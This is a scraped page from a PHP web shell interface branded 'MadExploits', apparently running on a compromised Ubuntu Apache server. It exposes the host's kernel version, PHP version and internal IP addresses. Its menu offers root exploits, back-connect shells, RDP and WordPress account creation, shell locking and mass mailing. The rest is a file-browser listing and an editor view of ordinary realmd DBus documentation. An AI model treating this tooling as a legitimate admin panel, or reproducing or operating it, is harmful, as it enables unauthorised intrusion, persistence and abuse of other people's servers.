Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
realmd /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
book.devhelp2
7.21
KB
-rw-r--r--
dbus-interface-raw.html
4.93
KB
-rw-r--r--
dbus-interface-reference.html
2.57
KB
-rw-r--r--
development.html
2.71
KB
-rw-r--r--
gdbus-org.freedesktop.realmd.K...
3.77
KB
-rw-r--r--
gdbus-org.freedesktop.realmd.K...
16.01
KB
-rw-r--r--
gdbus-org.freedesktop.realmd.P...
8.74
KB
-rw-r--r--
gdbus-org.freedesktop.realmd.R...
19.67
KB
-rw-r--r--
gdbus-org.freedesktop.realmd.S...
7.79
KB
-rw-r--r--
gtk-doc.css
8.64
KB
-rw-r--r--
guide-active-directory-client....
4.33
KB
-rw-r--r--
guide-active-directory-join.ht...
4.97
KB
-rw-r--r--
guide-active-directory-permit....
2.77
KB
-rw-r--r--
guide-active-directory.html
4.39
KB
-rw-r--r--
guide-integration.html
1.55
KB
-rw-r--r--
guide-ipa-client.html
1.87
KB
-rw-r--r--
guide-ipa-join.html
3.59
KB
-rw-r--r--
guide-ipa-permit.html
2.76
KB
-rw-r--r--
guide-ipa.html
3.89
KB
-rw-r--r--
guide-kerberos.html
3.41
KB
-rw-r--r--
guide.html
3.68
KB
-rw-r--r--
home.png
566
B
-rw-r--r--
index.html
4.39
KB
-rw-r--r--
left.png
362
B
-rw-r--r--
realm-manual.html
1.82
KB
-rw-r--r--
realm.html
19.56
KB
-rw-r--r--
realmd-conf.html
20.47
KB
-rw-r--r--
right.png
377
B
-rw-r--r--
style.css
1.71
KB
-rw-r--r--
up.png
287
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dbus-interface-raw.html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Raw DBus Interfaces: realmd</title> <meta name="generator" content="DocBook XSL Stylesheets Vsnapshot"> <link rel="home" href="index.html" title="realmd"> <link rel="up" href="development.html" title="Part II. Developer Reference"> <link rel="prev" href="gdbus-org.freedesktop.realmd.Service.html" title="org.freedesktop.realmd.Service"> <link rel="stylesheet" href="style.css" type="text/css"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table class="navigation" id="top" width="100%" summary="Navigation header" cellpadding="2" cellspacing="5"><tr valign="middle"> <td width="100%" align="left" class="shortcuts"></td> <td><a accesskey="h" href="index.html"><img src="home.png" width="16" height="16" border="0" alt="Home"></a></td> <td><a accesskey="u" href="development.html"><img src="up.png" width="16" height="16" border="0" alt="Up"></a></td> <td><a accesskey="p" href="gdbus-org.freedesktop.realmd.Service.html"><img src="left.png" width="16" height="16" border="0" alt="Prev"></a></td> <td><img src="right-insensitive.png" width="16" height="16" border="0"></td> </tr></table> <div class="chapter"> <div class="titlepage"><div><div><h2 class="title"> <a name="dbus-interface-raw"></a>Raw DBus Interfaces</h2></div></div></div> <p>These are the current raw DBus interfaces for realmd.</p> <pre class="programlisting"> <span><node name='/'> <interface name='org.freedesktop.realmd.Provider'> <property name='Name' type='s' access='read'></property> <property name='Version' type='s' access='read'></property> <property name='Realms' type='ao' access='read'></property> <method name='Discover'> <arg name='string' type='s' direction='in'></arg> <arg name='options' type='a{sv}' direction='in'></arg> <arg name='relevance' type='i' direction='out'></arg> <arg name='realm' type='ao' direction='out'></arg> </method> </interface> <interface name='org.freedesktop.realmd.Service'> <method name='Cancel'> <arg name='operation' type='s' direction='in'></arg> </method> <method name='SetLocale'> <arg name='locale' type='s' direction='in'></arg> </method> <signal name='Diagnostics'> <arg name='data' type='s'></arg> <arg name='operation' type='s'></arg> </signal> <method name='Release'> </method> </interface> <interface name='org.freedesktop.realmd.Realm'> <property name='Name' type='s' access='read'></property> <property name='Configured' type='s' access='read'></property> <method name='Deconfigure'> <arg name='options' type='a{sv}' direction='in'></arg> </method> <property name='SupportedInterfaces' type='as' access='read'></property> <property name='Details' type='a(ss)' access='read'></property> <property name='RequiredPackages' type='as' access='read'></property> <property name='LoginFormats' type='as' access='read'></property> <property name='LoginPolicy' type='s' access='read'></property> <property name='PermittedLogins' type='as' access='read'></property> <property name='PermittedGroups' type='as' access='read'></property> <method name='ChangeLoginPolicy'> <arg name='login_policy' type='s' direction='in'></arg> <arg name='permitted_add' type='as' direction='in'></arg> <arg name='permitted_remove' type='as' direction='in'></arg> <arg name='options' type='a{sv}' direction='in'></arg> </method> </interface> <interface name='org.freedesktop.realmd.Kerberos'> <property name='RealmName' type='s' access='read'></property> <property name='DomainName' type='s' access='read'></property> </interface> <interface name='org.freedesktop.realmd.KerberosMembership'> <property name='SuggestedAdministrator' type='s' access='read'></property> <property name='SupportedJoinCredentials' type='a(ss)' access='read'></property> <property name='SupportedLeaveCredentials' type='a(ss)' access='read'></property> <method name='Join'> <arg name='credentials' type='(ssv)' direction='in'></arg> <arg name='options' type='a{sv}' direction='in'></arg> </method> <method name='Leave'> <arg name='credentials' type='(ssv)' direction='in'></arg> <arg name='options' type='a{sv}' direction='in'></arg> </method> </interface> </node></span> </pre> </div> <div class="footer"> <hr>Generated by GTK-Doc</div> </body> </html>
Close